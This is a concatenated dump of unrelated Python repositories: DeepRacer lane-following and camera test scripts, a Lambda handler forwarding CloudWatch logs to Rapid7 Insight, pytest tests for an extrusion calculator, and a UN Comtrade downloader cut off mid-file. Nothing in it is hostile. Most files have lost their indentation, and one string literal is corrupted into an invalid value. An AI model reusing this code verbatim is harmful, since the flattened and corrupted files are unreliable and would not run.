im_ = WebcamImageToMat(im)
raw_input("Press_enter_to_capture_image: ")
im2 = cam_ctrl.getCurrentImage()
im2_ = WebcamImageToMat(im2)
cv2.imwrite("im1.png",im_)
cv2.imwrite("im2.png",im2_)
raw_input("Press enter to capture lane image: ")
im3 = cam_ctrl.getCurrentImage()
im3_ = WebcamImageToMat(im3)
cv2.imwrite("lane_image.png",im3_)
#cc.cal_main(cam_ctrl)
```
#### File: rr_awsdeepracer/clients/laneDriver.py
```python
import time
import numpy as np
import cv2
import sys
import math
import threading
import logging
#######################REMOVE THE CLIENT IMPORT ##################
import lane_finder
global cam_calibration, calibrate
def compute_steering_angle(frame, lane_lines):
""" Find the steering angle based on lane line coordinate
We assume that camera is calibrated to point to dead center
"""
if len(lane_lines) == 0:
return 0
height, width, _ = frame.shape
if len(lane_lines) == 1:
x1, _, x2, _ = lane_lines[0][0]
x_offset = width - x2
#ensures that with one lane line, we turn the correct direction
if x2 < (0.5*width):
x_offset = 0-abs(x_offset)
if x2 > (0.5*width):
x_offset = 0+abs(x_offset)
else:
_, _, left_x2, _ = lane_lines[0][0]
_, _, right_x2, _ = lane_lines[1][0]
half_width = 0.5 * width
x_offset = half_width - (left_x2 + right_x2) / 2
y_offset = int(height / 2)
angle_to_mid_radian = math.atan(x_offset / y_offset)
angle_to_mid_deg = int(angle_to_mid_radian * 180.0 / math.pi)
steering_angle = angle_to_mid_deg
return steering_angle
def length_of_line_segment(line):
x1, y1, x2, y2 = line
return math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)
def stabilize_steering_angle(curr_steering_angle, new_steering_angle, num_of_lane_lines, max_angle_deviation_two_lines=5, max_angle_deviation_one_lane=1):
"""
Using last steering angle to stabilize the steering angle
This can be improved to use last N angles, etc
if new angle is too different from current angle, only turn by max_angle_deviation degrees
"""
if num_of_lane_lines == 2 :
# if both lane lines detected, then we can deviate more
max_angle_deviation = max_angle_deviation_two_lines
else :
# if only one lane detected, don't deviate too much
max_angle_deviation = max_angle_deviation_one_lane
angle_deviation = new_steering_angle - curr_steering_angle
if abs(angle_deviation) > max_angle_deviation:
stabilized_steering_angle = int(curr_steering_angle
+ max_angle_deviation * angle_deviation / abs(angle_deviation))
else:
stabilized_steering_angle = new_steering_angle
return stabilized_steering_angle
class LaneDrive(object):
def __init__(self,servo_ctrl):
self._speed = 0
self._turn = 0
self._obj = False
self._servo = servo_ctrl
self.c_drive_by_angle = 0.0
def drive(self):
if len(self._lane_lines) == 0:
logging.error('No lane lines detected, nothing to do.')
return
new_steering_angle = compute_steering_angle(self._frame, self._lane_lines)
drive_by_angle = stabilize_steering_angle(self.c_drive_by_angle, new_steering_angle, len(self._lane_lines))
self.c_drive_by_angle = (drive_by_angle/33.3333333333)-0.02
if self._servo is not None:
self._servo.Drive(0.65,self.c_drive_by_angle)
def detect_lane(self,frame):
edges,frame_final = lane_finder.iso_lines(frame)
roi = lane_finder.ROI(edges)
lines = lane_finder.find_lines(roi)
lane_lines = lane_finder.average_slope_intercept(frame,lines)
self._lane_lines = lane_lines
self._frame = frame
@property
def lane_lines(self):
return self._lane_lines
@property
def frame(self):
return self._frame
```
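A small worked example for `compute_steering_angle`; only the frame shape matters, and the import path simply mirrors the file name.
```python
import numpy as np
from laneDriver import compute_steering_angle

frame = np.zeros((480, 640, 3), dtype=np.uint8)
lane_lines = [
    [[100, 480, 200, 240]],  # left lane line  (x1, y1, x2, y2)
    [[600, 480, 500, 240]],  # right lane line
]
# lane midpoint x = (200 + 500) / 2 = 350, frame centre = 640 / 2 = 320
# x_offset = 320 - 350 = -30, y_offset = 480 / 2 = 240
# atan(-30 / 240) = -7.1 degrees, truncated to -7 (steer slightly left)
print(compute_steering_angle(frame, lane_lines))  # -7
```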
#### File: rr_awsdeepracer/clients/lane_finder.py
```python
import time
import numpy as np
import cv2
import sys
import threading
import logging
import math
def iso_lines(frame):
hsv = cv2.cvtColor(frame,cv2.COLOR_BGR2HSV)
gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
ly = np.array([20,100,100],dtype=np.uint8)
uy = np.array([30,255,255],dtype=np.uint8)
lw = np.array([0,0,230],dtype=np.uint8)
uw = np.array([255,255,255],dtype=np.uint8)
w_mask = cv2.inRange(gray,200,255)
#w_mask = cv2.inRange(hsv,lw,uw)
y_mask = cv2.inRange(hsv,ly,uy)
yw_mask = cv2.bitwise_or(w_mask,y_mask)
final_image = cv2.bitwise_and(gray,yw_mask)
final_image_=cv2.GaussianBlur(final_image,(5,5),0)
canny_edge = cv2.Canny(final_image_,200,600)
return canny_edge,final_image
def ROI(frame):
height, width = frame.shape
mask = np.zeros_like(frame)
# only focus bottom half of the screen
polygon = np.array([[
(0, height * 1 / 2),
(width, height * 1 / 2),
(width, height),
(0, height),
]], np.int32)
cv2.fillPoly(mask, polygon, 255)
roi = cv2.bitwise_and(frame, mask)
return roi
def find_lines(frame):
# tuning min_threshold, minLineLength, maxLineGap is a trial and error process by hand
rho = 1 # distance precision in pixel, i.e. 1 pixel
angle = np.pi / 180 # angular precision in radian, i.e. 1 degree
min_threshold = 10 # minimal of votes
line_segments = cv2.HoughLinesP(frame, rho, angle, min_threshold,
np.array([]), minLineLength=8, maxLineGap=4)
return line_segments
def average_slope_intercept(frame, line_segments):
"""
This function combines line segments into one or two lane lines
If all line slopes are < 0: then we only have detected left lane
If all line slopes are > 0: then we only have detected right lane
"""
lane_lines = []
if line_segments is None:
logging.info('No line_segment segments detected')
return lane_lines
height, width, _ = frame.shape
left_fit = []
right_fit = []
boundary = 1/3
left_region_boundary = width * (1 - boundary) # left lane line segment should be on left 2/3 of the screen
right_region_boundary = width * boundary # right lane line segment should be on left 2/3 of the screen
for line_segment in line_segments:
for x1, y1, x2, y2 in line_segment:
if x1 == x2:
logging.info('skipping vertical line segment (slope=inf): %s' % line_segment)
continue
fit = np.polyfit((x1, x2), (y1, y2), 1)
slope = fit[0]
intercept = fit[1]
if abs(slope)<0.33:
continue
if slope < 0:
if x1 < left_region_boundary and x2 < left_region_boundary:
left_fit.append((slope, intercept))
else:
if x1 > right_region_boundary and x2 > right_region_boundary:
right_fit.append((slope, intercept))
left_fit_average = np.average(left_fit, axis=0)
if len(left_fit) > 0:
lane_lines.append(make_points(frame, left_fit_average))
right_fit_average = np.average(right_fit, axis=0)
if len(right_fit) > 0:
lane_lines.append(make_points(frame, right_fit_average))
logging.debug('lane lines: %s' % lane_lines) # [[[316, 720, 484, 432]], [[1009, 720, 718, 432]]]
return lane_lines
def make_points(frame, line):
height, width, _ = frame.shape
slope, intercept = line
y1 = height # bottom of the frame
y2 = int(y1 * 1 / 2) # make points from middle of the frame down
# bound the coordinates within the frame
x1 = max(-width, min(2 * width, int((y1 - intercept) / slope)))
x2 = max(-width, min(2 * width, int((y2 - intercept) / slope)))
return [[x1, y1, x2, y2]]
```
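Putting the helpers above together on a single frame, mirroring what `LaneDrive.detect_lane` does; `lane_image.png` refers to the capture written by `cameraTestClient.py`.
```python
import cv2
import lane_finder

frame = cv2.imread("lane_image.png")
edges, masked = lane_finder.iso_lines(frame)  # yellow/white mask + Canny edges
roi = lane_finder.ROI(edges)                  # keep only the bottom half
segments = lane_finder.find_lines(roi)        # probabilistic Hough transform
lane_lines = lane_finder.average_slope_intercept(frame, segments)
print(lane_lines)  # up to two lines, each as [[x1, y1, x2, y2]]
```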
#### File: rr_awsdeepracer/clients/lane_steam_test.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
import threading
import logging
import keyboard
import Queue
sys.path.append("..")
import lane_finder
import laneDriver
def nd_arr_transform(ros_frame):
_shape = (ros_frame.height,ros_frame.width,3)
_dtype = np.uint8
_buffer = ros_frame.data
_offset = ros_frame.step
_order = 'C'
return np.ndarray(_shape,_dtype,_buffer,order=_order)
def image_stream(cam_data):
im=cam_data.getCurrentImage()
im_ = nd_arr_transform(im)
return im_
def display_lines(frame, lines, line_color=(0, 255, 0), line_width=2):
line_image = np.zeros_like(frame)
if lines is not None:
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(line_image, (x1, y1), (x2, y2), line_color, line_width)
line_image = cv2.addWeighted(frame, 0.8, line_image, 1, 1)
return line_image
def main(frame):
vid_im = nd_arr_transform(frame)
out.write(vid_im)
class video_buffer(object):
def __init__(self,driver):
self._queue_lock = threading.RLock()
self._queue_driver_lock = threading.RLock()
self._queue = Queue.LifoQueue()
self.driver = driver
self.stopped = False
def add_queue(self,value):
with self._queue_lock:
self._queue.put(value)
def thread_func(self):
while not self.stopped and not self._queue.empty():
with self._queue_driver_lock:
frame = self._queue.get()
self.driver.detect_lane(frame)
self.driver.drive()
if __name__ == '__main__':
url_servo = 'rr+tcp://localhost:'+sys.argv[1]+'/?service=Servo'
url_camera = 'rr+tcp://localhost:'+sys.argv[2]+'/?service=AWSCamera'
servo_ctrl = RRN.ConnectService(url_servo)
cam_data = RRN.ConnectService(url_camera)
driver = laneDriver.LaneDrive(servo_ctrl)
raw_input("press enter to begin: ")
cam_data.startCamera()
vb = video_buffer(driver)
time.sleep(0.3)
im = cam_data.getCurrentImage()
frame_width = im.width
frame_height = im.height
#global out
#out = cv2.VideoWriter('lane_real.avi',cv2.VideoWriter_fourcc(*'XVID'), 10, (frame_width,frame_height))
servo_ctrl.Drive(0.8,0)
while True:
frame = image_stream(cam_data)
vb.add_queue(frame)
t = threading.Thread(target=vb.thread_func)
t.start()
#lane_lines = driver.lane_lines
#lane_line_image = display_lines(frame,lane_lines)
#out.write(lane_line_image)
try:
if keyboard.is_pressed('space'):
servo_ctrl.Stop()
break
except:
continue
#out.release()
```
#### File: rr_awsdeepracer/testing/lane_driving_test.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
import threading
import logging
sys.path.append("..")
import lane_finder
import laneDriver
def nd_arr_transform(ros_frame):
_shape = (ros_frame.height,ros_frame.width,3)
_dtype = np.uint8
_buffer = ros_frame.data
_offset = ros_frame.step
_order = 'C'
return np.ndarray(_shape,_dtype,_buffer,order=_order)
if __name__ == '__main__':
url_servo = 'rr+tcp://localhost:'+sys.argv[1]+'/?service=Servo'
url_camera = 'rr+tcp://localhost:'+sys.argv[2]+'/?service=AWSCamera'
servo_ctrl = RRN.ConnectService(url_servo)
cam_data = RRN.ConnectService(url_camera)
driver = laneDriver.LaneDrive(servo_ctrl)
cam_data.startCamera()
raw_input("Press Enter to begin: ")
im = cam_data.getCurrentImage()
im_ = nd_arr_transform(im)
driver.detect_lane(im_)
driver.drive()
time.sleep(6)
servo_ctrl.Stop()
```
#### File: rr_awsdeepracer/testing/servolaneTest.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
import threading
import logging
sys.path.append('..')
import laneDriver
def nd_arr_transform(ros_frame):
_shape = (ros_frame.height,ros_frame.width,3)
_dtype = np.uint8
_buffer = ros_frame.data
_offset = ros_frame.step
_order = 'C'
return np.ndarray(_shape,_dtype,_buffer,order=_order)
def image_stream(cam_data):
im=cam_data.getCurrentImage()
im_ = nd_arr_transform(im)
return im_
def display_lines(frame, lines, line_color=(0, 255, 0), line_width=2):
line_image = np.zeros_like(frame)
if lines is not None:
for line in lines:
for x1, y1, x2, y2 in line:
cv2.line(line_image, (x1, y1), (x2, y2), line_color, line_width)
line_image = cv2.addWeighted(frame, 0.8, line_image, 1, 1)
return line_image
if __name__ == '__main__':
url = 'rr+tcp://localhost:'+sys.argv[1]+'?service=AWSCamera'
print(url)
cam_ctrl = RRN.ConnectService(url)
cam_ctrl.startCamera()
driver = laneDriver.LaneDrive(None)
while True:
frame = image_stream(cam_ctrl)
driver.detect_lane(frame)
driver.drive()
print(driver.c_drive_by_angle)
```
#### File: rr_awsdeepracer/testing/stream_test.py
```python
from RobotRaconteur.Client import *
import time
import numpy as np
import cv2
import sys
sys.path.append('..')
import threading
import logging
def nd_arr_transform(ros_frame):
_shape = (ros_frame.height,ros_frame.width,3)
_dtype = np.uint8
_buffer = ros_frame.data
_offset = ros_frame.step
_order = 'C'
return np.ndarray(_shape,_dtype,_buffer,order=_order)
def next_frame(pipe_ep):
global current_frame
while(pipe_ep.Available > 0):
        image = pipe_ep.ReceivePacket()
current_frame = nd_arr_transform(image)
current_frame = None
if __name__ == '__main__':
url_camera = 'rr+tcp://localhost:'+sys.argv[1]+'/?service=AWSCamera'
cam_data = RRN.ConnectService(url_camera)
p=cam_data.ImageStream.Connect(-1)
p.PacketReceivedEvent+=next_frame
raw_input("press enter to begin: ")
cam_data.startCamera()
while True:
if (not current_frame is None):
cv2.imshow("Image",current_frame)
if cv2.waitKey(50)!=-1:
break
cv2.destroyAllWindows()
p.Close()
``` |
{
"source": "johnwquarles/r7insight_lambdaCW",
"score": 2
} |
#### File: johnwquarles/r7insight_lambdaCW/r7insight_lambdaCW.py
```python
import logging
import json
import socket
import ssl
import certifi
import os
from uuid import UUID
import base64
import zlib
logger = logging.getLogger()
logger.setLevel(logging.INFO)
logger.info('Loading function...')
REGION = os.environ.get('region')
ENDPOINT = f'{REGION}.data.logs.insight.rapid7.com'
PORT = 20000
TOKEN = os.environ.get('token')
FAKE_NEWLINE = u'\u<PASSWORD>'
def treat_message(message):
"""
Replace newline characters in the supplied message with "fake"
unicode line breaks (\u2028), so that the message can be sent
as a single log event.
"""
return message.replace('\n', FAKE_NEWLINE)
def lambda_handler(event, context):
sock = create_socket()
if not validate_uuid(TOKEN):
logger.critical(f'{TOKEN} is not a valid token. Exiting.')
raise SystemExit
else:
cw_data = base64.b64decode(event['awslogs']['data'])
cw_logs = zlib.decompress(cw_data, 16+zlib.MAX_WBITS)
log_events = json.loads(cw_logs)
logger.info('Received log stream...')
logger.info(log_events)
for log_event in log_events['logEvents']:
# look for extracted fields, if not present, send plain message
try:
msg = f"{TOKEN} {json.dumps(log_event['extractedFields'])}\n"
sock.sendall(msg.encode('utf-8'))
except KeyError:
treated_msg = treat_message(log_event['message'])
msg = f"{TOKEN} {treated_msg}\n"
sock.sendall(msg.encode('utf-8'))
sock.close()
logger.info('Function execution finished.')
def create_socket():
logger.info('Creating SSL socket')
s_ = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = ssl.wrap_socket(
sock=s_,
keyfile=None,
certfile=None,
server_side=False,
cert_reqs=ssl.CERT_REQUIRED,
ssl_version=getattr(
ssl,
'PROTOCOL_TLSv1_2',
ssl.PROTOCOL_TLSv1
),
ca_certs=certifi.where(),
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
)
try:
logger.info(f'Connecting to {ENDPOINT}:{PORT}')
s.connect((ENDPOINT, PORT))
return s
except socket.error as exc:
logger.error(f'Exception socket.error : {exc}')
def validate_uuid(uuid_string):
try:
val = UUID(uuid_string)
except Exception as uuid_exc:
logger.error(f'Can not validate token: {uuid_exc}')
return False
return val.hex == uuid_string.replace('-', '')
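# --- illustrative check, not part of the original handler ---
# validate_uuid() accepts a canonical hyphenated UUID string and rejects
# anything else (the sample token below is made up).
if __name__ == '__main__':
    print(validate_uuid('12345678-1234-5678-1234-567812345678'))  # True
    print(validate_uuid('not-a-valid-token'))                     # False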
``` |
{
"source": "johnwslee/extrucal",
"score": 3
} |
#### File: extrucal/tests/test_extrusion.py
```python
import pytest
import pandas as pd
import numpy as np
import altair as alt
from extrucal.extrusion import throughput_cal, throughput_table, throughput_plot
alt.renderers.enable('html')
def test_input_data():
"""
Check Errors raised when incorrect inputs are used
Test cases:
1. input types
2. input values
"""
# Test input types
with pytest.raises(TypeError):
throughput_cal("200", 10, 800)
with pytest.raises(TypeError):
throughput_cal(200, "10", 800)
with pytest.raises(TypeError):
throughput_cal(200, 10, "800")
with pytest.raises(TypeError):
throughput_cal(200, 10, 800, rpm="1")
with pytest.raises(TypeError):
throughput_cal(200, 10, 800, pitch="200")
with pytest.raises(TypeError):
throughput_cal(200, 10, 800, w_flight="20")
with pytest.raises(TypeError):
throughput_cal(200, 10, 800, n_flight=1.0)
with pytest.raises(TypeError):
throughput_table("200", 800)
with pytest.raises(TypeError):
throughput_table(200, "800")
with pytest.raises(TypeError):
throughput_table(200, 800, pitch="200")
with pytest.raises(TypeError):
throughput_table(200, 800, w_flight="20")
with pytest.raises(TypeError):
throughput_table(200, 800, n_flight=1.0)
with pytest.raises(TypeError):
throughput_table(200, 800, min_depth="4")
with pytest.raises(TypeError):
throughput_table(200, 800, max_depth="20")
with pytest.raises(TypeError):
throughput_table(200, 800, delta_depth="2")
with pytest.raises(TypeError):
throughput_table(200, 800, min_rpm="5")
with pytest.raises(TypeError):
throughput_table(200, 800, max_rpm="50")
with pytest.raises(TypeError):
throughput_table(200, 800, delta_rpm="5")
with pytest.raises(TypeError):
throughput_plot("200", 800)
with pytest.raises(TypeError):
throughput_plot(200, "800")
with pytest.raises(TypeError):
throughput_plot(200, 800, pitch="200")
with pytest.raises(TypeError):
throughput_plot(200, 800, w_flight="20")
with pytest.raises(TypeError):
throughput_plot(200, 800, n_flight=1.0)
with pytest.raises(TypeError):
throughput_plot(200, 800, min_depth="4")
with pytest.raises(TypeError):
throughput_plot(200, 800, max_depth="20")
with pytest.raises(TypeError):
throughput_plot(200, 800, delta_depth="2")
with pytest.raises(TypeError):
throughput_plot(200, 800, min_rpm="5")
with pytest.raises(TypeError):
throughput_plot(200, 800, max_rpm="50")
with pytest.raises(TypeError):
throughput_plot(200, 800, delta_rpm="5")
# Test input values
with pytest.raises(ValueError):
throughput_cal(200, 1, 800)
with pytest.raises(ValueError):
throughput_cal(200, 61, 800)
with pytest.raises(ValueError):
throughput_cal(4, 1, 800)
with pytest.raises(ValueError):
throughput_cal(501, 20, 800)
with pytest.raises(ValueError):
throughput_cal(200, 10, 290)
with pytest.raises(ValueError):
throughput_cal(200, 10, 3001)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, pitch=39)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, pitch=501)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, w_flight=1.9)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, w_flight=141)
with pytest.raises(ValueError):
throughput_cal(200, 10, 800, n_flight=3)
with pytest.raises(ValueError):
throughput_table(200, 800, min_depth=1)
with pytest.raises(ValueError):
throughput_table(200, 800, max_depth=61)
with pytest.raises(ValueError):
throughput_table(4, 800)
with pytest.raises(ValueError):
throughput_table(501, 800)
with pytest.raises(ValueError):
throughput_table(200, 290)
with pytest.raises(ValueError):
throughput_table(200, 3001)
with pytest.raises(ValueError):
throughput_table(200, 800, pitch=39)
with pytest.raises(ValueError):
throughput_table(200, 800, pitch=501)
with pytest.raises(ValueError):
throughput_table(200, 800, w_flight=1.9)
with pytest.raises(ValueError):
throughput_table(200, 800, w_flight=141)
with pytest.raises(ValueError):
throughput_table(200, 800, n_flight=3)
with pytest.raises(ValueError):
throughput_plot(200, 800, min_depth=1)
with pytest.raises(ValueError):
throughput_plot(200, 800, max_depth=61)
with pytest.raises(ValueError):
throughput_plot(4, 800)
with pytest.raises(ValueError):
throughput_plot(501, 800)
with pytest.raises(ValueError):
throughput_plot(200, 290)
with pytest.raises(ValueError):
throughput_plot(200, 3001)
with pytest.raises(ValueError):
throughput_plot(200, 800, pitch=39)
with pytest.raises(ValueError):
throughput_plot(200, 800, pitch=501)
with pytest.raises(ValueError):
throughput_plot(200, 800, w_flight=1.9)
with pytest.raises(ValueError):
throughput_plot(200, 800, w_flight=141)
with pytest.raises(ValueError):
throughput_plot(200, 800, n_flight=3)
def test_output():
"""
Check if the returned output is correct
"""
# Test the output of throughput_cal()
expected1 = 23.51
actual1 = throughput_cal(200, 10, 800, rpm=1, pitch=200, w_flight=20, n_flight=1)
assert actual1 == expected1, "Calculated Value is wrong!!!"
expected2 = 4540.04
actual2 = throughput_cal(250, 12, 800, rpm=100, pitch=300, w_flight=25, n_flight=2)
assert actual2 == expected2, "Calculated Value is wrong!!!"
expected3 = 1.69
actual3 = throughput_cal(20, 2, 1000, rpm=30, pitch=20, w_flight=2, n_flight=1)
assert actual3 == expected3, "Calculated Value is wrong!!!"
expected4 = 12.24
actual4 = throughput_cal(150, 6.8, 800, rpm=1, pitch=206, w_flight=9, n_flight=1)
assert actual4 == expected4, "Calculated Value is wrong!!!"
# Test the output of throughput_table()
expected5 = 10
actual5 = len(throughput_table(200, 1000))
assert actual5 == expected5, "The number of rows doesn't match!!!"
expected6 = 9
actual6 = len(throughput_table(200, 1000, min_rpm=6))
assert actual6 == expected6, "The number of rows doesn't match!!!"
expected7 = 2
actual7 = len(throughput_table(200, 1000, max_rpm=14))
assert actual7 == expected7, "The number of rows doesn't match!!!"
expected8 = 8
actual8 = len(throughput_table(200, 1000).columns)
assert actual8 == expected8, "The number of columns doesn't match!!!"
expected9 = 3
actual9 = len(throughput_table(200, 1000, max_depth=9).columns)
assert actual9 == expected9, "The number of columns doesn't match!!!"
expected10 = 2
actual10 = len(throughput_table(200, 1000, min_depth=16).columns)
assert actual10 == expected10, "The number of columns doesn't match!!!"
# Test the output of throughput_plot()
test_plot = throughput_plot(200, 1000)
assert str(type(test_plot)) == "<class 'altair.vegalite.v4.api.Chart'>"
assert test_plot.encoding.x.shorthand == 'RPM', "'RPM' should be mapped to the x axis"
assert test_plot.encoding.y.shorthand == 'throughput', "'throughput' should be mapped to the y axis"
assert test_plot.mark == 'circle', "mark should be a circle"
tooltip = "[Tooltip({\n shorthand: 'RPM'\n}), Tooltip({\n shorthand: 'depth'\n}), Tooltip({\n shorthand: 'throughput'\n})]"
assert str(throughput_plot(200, 1000).encoding.tooltip) == tooltip
``` |
{
"source": "johnx25bd/casa-digital-visualisation",
"score": 3
} |
#### File: data/Comparison/UN_Comtrade.py
```python
import pandas as pd
import numpy as np
import json
import requests
import os.path
import itertools
from time import sleep
base_url = 'https://comtrade.un.org/api/get?'
def download_trade_data(filename, human_readable=False, verbose=True,
period='recent', frequency='A', reporter='USA', partner='all', product='total', tradeflow='exports'):
"""
Downloads records from the UN Comtrade database and saves them in a csv-file with the name "filename".
If necessary, it calls the API several times.
There are two modes:
- human_readable = False (default): headings in output are not human-readable but error messages from the API are received and displayed
- human_readable = True: headings in output are human-readable but we do not get messages from the API about potential problems (not recommended if several API calls are necessary)
Additional option: verbose = False in order to suppress both messages from the API and messages like '100 records downloaded and saved in filename.csv' (True is default)
Parameters:
Using parameter values suggested in the API documentation should always work.
For the parameters period, reporter, partner and tradeflow more intuitive options have been added.
- period [ps] : depending on freq, either YYYY or YYYYMM (or 'YYYY-YYYY'/ 'YYYYMM-YYYYMM' or a list of those) or 'now' or 'recent' (= 5 most recent years/ months) or 'all'
- frequency [freq] : 'A' (= annual) or 'M' (= monthly)
- reporter [r] : reporter code/ name (case-sensitive!) or list of reporter codes/ names or 'all' (see https://comtrade.un.org/data/cache/reporterAreas.json)
- partner [p] : partner code/ name (case-sensitive!) or list of partner codes/ names or 'all' (see https://comtrade.un.org/data/cache/partnerAreas.json)
- product [cc] : commodity code valid in the selected classification (here: Harmonized System HS) or 'total' (= aggregated) or 'all' or 'HG2', 'HG4' or 'HG6' (= all 2-, 4- and 6-digit HS commodities)
- tradeflow [rg] : 'import[s]' or 'export[s]'; see https://comtrade.un.org/data/cache/tradeRegimes.json for further, lower-level options
Information copied from the API Documentation (https://comtrade.un.org/data/doc/api/):
Usage limits
Rate limit (guest): 1 request every second (per IP address or authenticated user).
Usage limit (guest): 100 requests per hour (per IP address or authenticated user).
Parameter combination limit: ps, r and p are limited to 5 codes each. Only one of the above codes may use the special ALL value in a given API call.
Classification codes (cc) are limited to 20 items. ALL is always a valid classification code.
If you hit a usage limit a 409 (conflict) error is returned along with a message specifying why the request was blocked and when requests may resume.
Stability
Notice: this API may be considered stable. However, new fields may be added in the future.
While this API is still subject to change, changes that remove fields will be announced and a method of accessing legacy field formats will be made available during a transition period.
New fields may be added to the CSV or JSON output formats without warning. Please write your code that accesses the API accordingly.
"""
# (1) replace more convenient input options by ones that can by understood by API
# e.g. replace country names by country codes or 'YYYYMM-YYYYMM' by a list of months
reporter = transform_reporter(reporter)
partner = transform_partner(partner)
tradeflow = transform_tradeflow(tradeflow)
period = transform_period(period, frequency)
# (2) warn/ raise an error if appropriate
if sum('all' in inpt for inpt in [reporter, partner, period]) > 1:
raise ValueError("Only one of the parameters 'reporter', 'partner' and 'period' may use the special ALL value in a given API call.")
if any(len(inpt) > 5 for inpt in [reporter, partner, period]) and human_readable:
print("Using the option human_readable=True is not recommended in this case because several API calls are necessary.")
print("When using the human_readable=True option, messages from the API cannot be received!")
response = input("Press y if you want to continue anyways. ")
if response != 'y':
return None # exit function
# (3) download data by doing one or several API calls
dfs = []
slice_points = [range(0, len(inpt), 5) for inpt in [reporter, partner, period]] + \
[range(0, len(product), 20)]
# since the parameters reporter, partner and period are limited to 5 inputs each and
# product is limited to 20 inputs
for i, j, k, m in itertools.product(*slice_points):
df = download_trade_data_base(human_readable=human_readable, verbose=verbose,
period=period[k:k+5], reporter=reporter[i:i+5],
partner=partner[j:j+5], product=product[m:m+20],
tradeflow=tradeflow, frequency=frequency, )
if df is not None:
dfs.append(df)
sleep(1) # wait 1 second because of API rate limit
# (4) save dataframe as csv file
if len(dfs) > 0:
df_all = pd.concat(dfs)
filename = filename if len(filename.split('.')) == 2 else filename + '.csv' # add '.csv' if necessary
df_all.to_csv(filename)
if verbose: print('{} records downloaded and saved as {}.'.format(len(df_all), filename))
def download_trade_data_base(human_readable=False, verbose=True,
period='recent', frequency='A', reporter=842, partner='all', product='total', tradeflow=2):
"""
Downloads records from the UN Comtrade database and returns pandas dataframe using one API call.
There are two modes:
- human_readable = False (default): headings in output are not human-readable but error messages from the API are received and displayed
- human_readable = True: headings in output are human-readable but we do not get messages from the API about potential problems
Additional option: verbose = False in order to suppress messages from the API (True is default)
Parameters of the API call:
As documented in the API documentation.
More intuitive options for the parameters period, reporter, partner and tradeflow are only available in the function 'download_trade_data'!
- period [ps] : depending on freq, either YYYY or YYYYMM (or a list of those) or 'now' or 'recent' (= 5 most recent years/ months) or 'all'
- frequency [freq] : 'A' (= annual) or 'M' (= monthly)
- reporter [r] : reporter code or list of reporter codes or 'all' (see https://comtrade.un.org/data/cache/reporterAreas.json)
- partner [p] : partner code or list of partner codes or 'all' (see https://comtrade.un.org/data/cache/partnerAreas.json)
- product [cc] : commodity code valid in the selected classification (here: Harmonized System HS) or 'total' (= aggregated) or 'all' or 'HG2', 'HG4' or 'HG6' (= all 2-, 4- and 6-digit HS commodities)
- tradeflow [rg] : 1 (for imports) or 2 (for exports); see https://comtrade.un.org/data/cache/tradeRegimes.json for further options
"""
fmt = 'csv' if human_readable else 'json'
head = 'H' if human_readable else 'M'
parameters = {
'ps': period,
'freq': frequency,
'r': reporter,
'p': partner,
'cc': product,
'rg': tradeflow,
'px': 'HS', # Harmonized System (as reported) as classification scheme
'type': 'C', # Commodities ('S' for Services)
'fmt': fmt, # format of the output
'max': 50000, # maximum number of rows -> what happens if number of rows is bigger?
# https://comtrade.un.org/data/dev/portal#subscription says it is 100 000
'head': head # human readable headings ('H') or machine readable headings ('M')
}
url = base_url + dict_to_string(parameters)
if verbose: print(url)
if human_readable:
dataframe = pd.read_csv(url)
else:
json_dict = requests.get(url).json()
n_records = json_dict['validation']['count']['value']
message = json_dict['validation']['message']
if not json_dict['dataset']:
if verbose: print('Error: empty dataset \n Message: {}'.format(message))
dataframe = None
else:
if verbose and message: print('Message: {}'.format(message))
dataframe = pd.DataFrame.from_dict(json_dict['dataset'])
return dataframe
###############################################################################
def transform_reporter(reporter):
"""
replaces country names in reporter by the corresponding country codes
"""
# if single country code/ name, convert to list
reporter = [reporter] if not isinstance(reporter, list) else reporter
# replace country names by country codes
reporter = [r if is_country_code(r) else find_reporter_code(r) for r in reporter]
return reporter
def transform_partner(partner):
"""
replaces country names in partner by the corresponding country codes
"""
# if single country code/ name, convert to list
partner = [partner] if not isinstance(partner, list) else partner
# replace country names by country codes
partner = [p if is_country_code(p) else find_partner_code(p) for p in partner]
return partner
def transform_tradeflow(tradeflow):
"""
replace tradeflow "import(s)" or "export(s)" by the corresponding numbers (1 / 2)
"""
if isinstance(tradeflow, str):
if 'export' in tradeflow.lower():
tradeflow = 2
elif 'import' in tradeflow.lower():
tradeflow = 1
return tradeflow
def transform_period(period, frequency):
"""
detects 'YYYY-YYYY' or 'YYYYMM-YYYYMM' inputs and transforms them into lists of YYYY or YYYYMM that the API can understand
the function does not check whether the other inputs for period are valid!
period: depending on freq, either YYYY or YYYYMM (or 'YYYY-YYYY'/ 'YYYYMM-YYYYMM' or a list of those) or 'now' or 'recent' or 'all'
frequency: 'A' or 'M'
"""
period = [period] if not isinstance(period, list) else period
period_new = []
for p in period:
if isinstance(p, str) and '-' in p:
start, end = p.split('-')
if frequency.lower() == 'a':
y_start = int(start)
y_end = int(end)
for y in range(y_start, y_end + 1):
period_new.append(y)
elif frequency.lower() == 'm':
y_start, m_start = int(start[:4]), int(start[4:])
y_end, m_end = int(end[:4]), int(end[4:])
n = (m_end - m_start + 1) + 12 * (y_end - y_start)
y, m = y_start, m_start
for _ in range(n):
period_new.append('{}{:02d}'.format(y, m))
if m >= 1 and m < 12:
m += 1
elif m == 12:
m = 1
y += 1
else:
raise Exception("Shouldn't get here.")
else:
raise Exception("Frequency neither 'A'/'a' nor 'M'/'m'.")
else:
period_new.append(p)
return period_new
def is_country_code(inpt):
"""
checks if inpt is a valid country code, i.e. an integer, an integer converted to a string or 'all'
output: True or False
"""
if isinstance(inpt, str):
return inpt.lower() == 'all' or inpt.isdigit()
else:
return isinstance(inpt, int) or isinstance(inpt, np.int64)
def find_reporter_code(country):
"""
see 'find_country_code'
"""
return find_country_code(country, 'reporter')
def find_partner_code(country):
"""
see 'find_country_code'
"""
return find_country_code(country, 'partner')
